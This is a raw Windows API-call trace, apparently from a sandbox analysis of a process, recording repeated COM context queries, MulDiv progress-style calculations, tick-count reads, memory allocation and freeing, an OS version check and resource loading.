	[0048.362] ??2@YAPEAX_K@Z () returned 0x386740
	[0048.363] ??2@YAPEAX_K@Z () returned 0x386770
	[0048.363] ??2@YAPEAX_K@Z () returned 0x3867a0
	[0048.364] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.366] ??3@YAXPEAX@Z () returned 0x1
	[0048.366] ??3@YAXPEAX@Z () returned 0xb00500001
	[0048.366] ??3@YAXPEAX@Z () returned 0xc004d0001
	[0048.366] ??3@YAXPEAX@Z () returned 0xd004a0001
	[0048.366] ??3@YAXPEAX@Z () returned 0xe00470001
	[0048.366] ??3@YAXPEAX@Z () returned 0xf00440001
	[0048.366] ??3@YAXPEAX@Z () returned 0x1000410001
	[0048.366] ??3@YAXPEAX@Z () returned 0x11003e0001
	[0048.366] ??3@YAXPEAX@Z () returned 0x12003b0001
	[0048.366] ??3@YAXPEAX@Z () returned 0x1300380001
	[0048.366] ??3@YAXPEAX@Z () returned 0x1400350001
	[0048.367] ??3@YAXPEAX@Z () returned 0x1500320001
	[0048.367] ??3@YAXPEAX@Z () returned 0x16002f0001
	[0048.367] ??3@YAXPEAX@Z () returned 0x17002c0001
	[0048.367] ??3@YAXPEAX@Z () returned 0x1800290001
	[0048.367] ??3@YAXPEAX@Z () returned 0x1900260001
	[0048.367] ??3@YAXPEAX@Z () returned 0x1a00230001
	[0048.367] ??3@YAXPEAX@Z () returned 0x1b00200001
	[0048.367] ??3@YAXPEAX@Z () returned 0x1c001d0001
	[0048.367] ??3@YAXPEAX@Z () returned 0x1d001a0001
	[0048.367] ??3@YAXPEAX@Z () returned 0x1e00170001
	[0048.367] ??3@YAXPEAX@Z () returned 0x1f00140001
	[0048.367] ??3@YAXPEAX@Z () returned 0x2000110001
	[0048.367] ??3@YAXPEAX@Z () returned 0x21000e0001
	[0048.367] ??3@YAXPEAX@Z () returned 0x1
	[0048.367] ??3@YAXPEAX@Z () returned 0x200200001
	[0048.367] ??3@YAXPEAX@Z () returned 0x3001d0001
	[0048.368] ??3@YAXPEAX@Z () returned 0x22000b0001
	[0048.368] ??3@YAXPEAX@Z () returned 0x4001a0001
	[0048.368] ??3@YAXPEAX@Z () returned 0x500170001
	[0048.368] ??3@YAXPEAX@Z () returned 0x2300080001
	[0048.368] ??3@YAXPEAX@Z () returned 0x600140001
	[0048.368] ??3@YAXPEAX@Z () returned 0x700110001
	[0048.368] ??3@YAXPEAX@Z () returned 0x2400050001
	[0048.368] ??3@YAXPEAX@Z () returned 0x8000e0001
	[0048.368] ??3@YAXPEAX@Z () returned 0x9000b0001
	[0048.368] ??3@YAXPEAX@Z () returned 0xa00080001
	[0048.368] ??3@YAXPEAX@Z () returned 0xb00050001
	[0048.368] ??3@YAXPEAX@Z () returned 0xc007a0001
	[0048.368] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0048.368] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.368] GetTickCount () returned 0x1d4ac
	[0048.369] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.369] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0048.369] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.369] GetTickCount () returned 0x1d4ac
	[0048.370] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3077b8 | out: ppv=0x3077b8*=0x11f420) returned 0x0
	[0048.371] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0048.371] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.371] GetTickCount () returned 0x1d4ac
	[0048.371] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.371] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0048.371] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.372] GetTickCount () returned 0x1d4ac
	[0048.372] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.372] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0048.372] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.372] GetTickCount () returned 0x1d4ac
	[0048.380] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.380] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0048.380] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.380] GetTickCount () returned 0x1d4bb
	[0048.383] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3077b8 | out: ppv=0x3077b8*=0x11f420) returned 0x0
	[0048.383] ??3@YAXPEAX@Z () returned 0x1
	[0048.383] ??3@YAXPEAX@Z () returned 0x2000530001
	[0048.383] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0048.383] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.383] GetTickCount () returned 0x1d4bb
	[0048.383] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.384] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0048.384] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.384] GetTickCount () returned 0x1d4bb
	[0048.384] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.384] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0048.384] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.384] GetTickCount () returned 0x1d4bb
	[0048.385] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.385] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0048.385] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.385] GetTickCount () returned 0x1d4bb
	[0048.386] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.386] ??3@YAXPEAX@Z () returned 0x1300620001
	[0048.386] ??3@YAXPEAX@Z () returned 0x14005f0001
	[0048.386] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0048.386] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.386] GetTickCount () returned 0x1d4bb
	[0048.386] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.387] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0048.387] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.387] GetTickCount () returned 0x1d4bb
	[0048.387] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.388] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0048.388] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.388] GetTickCount () returned 0x1d4bb
	[0048.388] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.388] ??3@YAXPEAX@Z () returned 0x1
	[0048.388] ??3@YAXPEAX@Z () returned 0x4900020001
	[0048.389] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0048.389] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.389] GetTickCount () returned 0x1d4bb
	[0048.423] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.423] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0048.423] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.423] GetTickCount () returned 0x1d4ea
	[0048.423] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.424] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0048.424] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.424] GetTickCount () returned 0x1d4ea
	[0048.425] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.425] ??3@YAXPEAX@Z () returned 0x1
	[0048.425] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0048.425] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.425] GetTickCount () returned 0x1d4ea
	[0048.425] GetVersionExA (in: lpVersionInformation=0x30c840*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x3612f0, dwBuildNumber=0x0, dwPlatformId=0x11e198, szCSDVersion="") | out: lpVersionInformation=0x30c840*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0048.426] FindResourceA (hModule=0x7fee32d0000, lpName=0x139, lpType=0x6) returned 0x3207f8
	[0048.426] LoadResource (hModule=0x7fee32d0000, hResInfo=0x3207f8) returned 0x321d44
	[0048.426] LockResource (hResData=0x321d44) returned 0x321d44
	[0048.426] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x3207f8) returned 0x15c
	[0048.426] FreeResource (hResData=0x321d44) returned 0
	[0048.427] FindResourceA (hModule=0x7fee32d0000, lpName=0x101, lpType=0x6) returned 0x3207e8
	[0048.427] LoadResource (hModule=0x7fee32d0000, hResInfo=0x3207e8) returned 0x321c74
	[0048.427] LockResource (hResData=0x321c74) returned 0x321c74
	[0048.427] SizeofResource (hModule=0x7fee32d0000, hResInfo=0x3207e8) returned 0xce
	[0048.427] FreeResource (hResData=0x321c74) returned 0
	[0048.427] bsearch (_Key=0x30d1d8, _Base=0x7fee339a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee33281a0) returned 0x7fee339a5a8
	[0048.427] ??2@YAPEAX_K@Z () returned 0x3c0a20
	[0048.428] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.428] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0048.428] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.428] GetTickCount () returned 0x1d4ea
	[0048.430] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3077b8 | out: ppv=0x3077b8*=0x11f420) returned 0x0
	[0048.430] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0048.430] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.430] GetTickCount () returned 0x1d4ea
	[0048.430] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.431] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0048.431] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.431] GetTickCount () returned 0x1d4ea
	[0048.431] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.431] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0048.431] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.431] GetTickCount () returned 0x1d4ea
	[0048.431] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.433] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.433] MulDiv (nNumber=1282, nNumerator=100, nDenominator=2880) returned 45
	[0048.433] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.433] GetTickCount () returned 0x1d4ea
	[0048.434] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3077b8 | out: ppv=0x3077b8*=0x11f420) returned 0x0
	[0048.434] ??3@YAXPEAX@Z () returned 0x3d00350001
	[0048.434] ??3@YAXPEAX@Z () returned 0x3e00e30001
	[0048.435] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.435] MulDiv (nNumber=929, nNumerator=100, nDenominator=2679) returned 35
	[0048.435] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.435] GetTickCount () returned 0x1d4ea
	[0048.437] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.437] ??3@YAXPEAX@Z () returned 0xbf00e00001
	[0048.437] ??3@YAXPEAX@Z () returned 0xc000290001
	[0048.438] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.438] MulDiv (nNumber=939, nNumerator=100, nDenominator=2821) returned 33
	[0048.438] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.438] GetTickCount () returned 0x1d4fa
	[0048.439] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.439] ??3@YAXPEAX@Z () returned 0x1
	[0048.439] ??3@YAXPEAX@Z () returned 0x13500fb0001
	[0048.440] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.440] MulDiv (nNumber=953, nNumerator=100, nDenominator=2951) returned 32
	[0048.440] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.440] GetTickCount () returned 0x1d4fa
	[0048.440] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.441] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3077b8 | out: ppv=0x3077b8*=0x11f420) returned 0x0
	[0048.442] MulDiv (nNumber=1053, nNumerator=100, nDenominator=3278) returned 32
	[0048.442] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.442] GetTickCount () returned 0x1d4fa
	[0048.442] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x309548 | out: ppv=0x309548*=0x11f420) returned 0x0
	[0048.445] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x305a28 | out: ppv=0x305a28*=0x11f420) returned 0x0
	[0048.445] MulDiv (nNumber=1103, nNumerator=100, nDenominator=3418) returned 32
	[0048.445] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.445] GetTickCount () returned 0x1d4fa
	[0048.446] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3077b8 | out: ppv=0x3077b8*=0x11f420) returned 0x0
	[0048.446] ??3@YAXPEAX@Z () returned 0x1
	[0048.449] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x305a28 | out: ppv=0x305a28*=0x11f420) returned 0x0
	[0048.449] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.449] MulDiv (nNumber=1032, nNumerator=100, nDenominator=3419) returned 30
	[0048.449] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.449] GetTickCount () returned 0x1d4fa
	[0048.450] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3077b8 | out: ppv=0x3077b8*=0x11f420) returned 0x0
	[0048.450] free (_Block=0x3dbc70) 
	[0048.450] free (_Block=0x3959a0) 
	[0048.450] free (_Block=0x40a7e0) 
	[0048.450] free (_Block=0x3da860) 
	[0048.450] free (_Block=0x3c4e30) 
	[0048.450] free (_Block=0x39b630) 
	[0048.450] free (_Block=0x38ebd0) 
	[0048.451] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.451] ??3@YAXPEAX@Z () returned 0xe1002a0001
	[0048.453] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3077b8 | out: ppv=0x3077b8*=0x11f420) returned 0x0
	[0048.453] ??3@YAXPEAX@Z () returned 0x1
	[0048.453] MulDiv (nNumber=986, nNumerator=100, nDenominator=3451) returned 29
	[0048.454] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.454] GetTickCount () returned 0x1d509
	[0048.455] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x305a28 | out: ppv=0x305a28*=0x11f420) returned 0x0
	[0048.457] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x301f08 | out: ppv=0x301f08*=0x11f420) returned 0x0
	[0048.457] MulDiv (nNumber=1031, nNumerator=100, nDenominator=3503) returned 29
	[0048.457] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.457] GetTickCount () returned 0x1d509
	[0048.459] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ffb38 | out: ppv=0x2ffb38*=0x11f420) returned 0x0
	[0048.460] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3018c8 | out: ppv=0x3018c8*=0x11f420) returned 0x0
	[0048.460] ??3@YAXPEAX@Z () returned 0x1
	[0048.460] MulDiv (nNumber=1023, nNumerator=100, nDenominator=3505) returned 29
	[0048.460] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.460] GetTickCount () returned 0x1d509
	[0048.461] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fda68 | out: ppv=0x2fda68*=0x11f420) returned 0x0
	[0048.461] ??3@YAXPEAX@Z () returned 0x1
	[0048.463] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fda68 | out: ppv=0x2fda68*=0x11f420) returned 0x0
	[0048.464] MulDiv (nNumber=997, nNumerator=100, nDenominator=3499) returned 28
	[0048.464] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.464] GetTickCount () returned 0x1d509
	[0048.465] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fda68 | out: ppv=0x2fda68*=0x11f420) returned 0x0
	[0048.465] free (_Block=0x3ead30) 
	[0048.465] free (_Block=0x396810) 
	[0048.465] free (_Block=0x41a030) 
	[0048.465] free (_Block=0x3e9920) 
	[0048.465] free (_Block=0x3c8a90) 
	[0048.465] free (_Block=0x39d490) 
	[0048.465] free (_Block=0x38e6b0) 
	[0048.465] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.465] ??3@YAXPEAX@Z () returned 0x110004a0001
	[0048.475] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fda68 | out: ppv=0x2fda68*=0x11f420) returned 0x0
	[0048.476] MulDiv (nNumber=972, nNumerator=100, nDenominator=3563) returned 27
	[0048.476] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.476] GetTickCount () returned 0x1d519
	[0048.477] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fda68 | out: ppv=0x2fda68*=0x11f420) returned 0x0
	[0048.479] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fda68 | out: ppv=0x2fda68*=0x11f420) returned 0x0
	[0048.479] MulDiv (nNumber=960, nNumerator=100, nDenominator=3619) returned 27
	[0048.479] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.479] GetTickCount () returned 0x1d519
	[0048.480] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fda68 | out: ppv=0x2fda68*=0x11f420) returned 0x0
	[0048.483] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fda68 | out: ppv=0x2fda68*=0x11f420) returned 0x0
	[0048.483] ??3@YAXPEAX@Z () returned 0x10100770001
	[0048.483] MulDiv (nNumber=1007, nNumerator=100, nDenominator=3706) returned 27
	[0048.483] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.483] GetTickCount () returned 0x1d529
	[0048.484] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fda68 | out: ppv=0x2fda68*=0x11f420) returned 0x0
	[0048.487] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3018c8 | out: ppv=0x3018c8*=0x11f420) returned 0x0
	[0048.487] MulDiv (nNumber=1060, nNumerator=100, nDenominator=3765) returned 28
	[0048.487] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.487] GetTickCount () returned 0x1d529
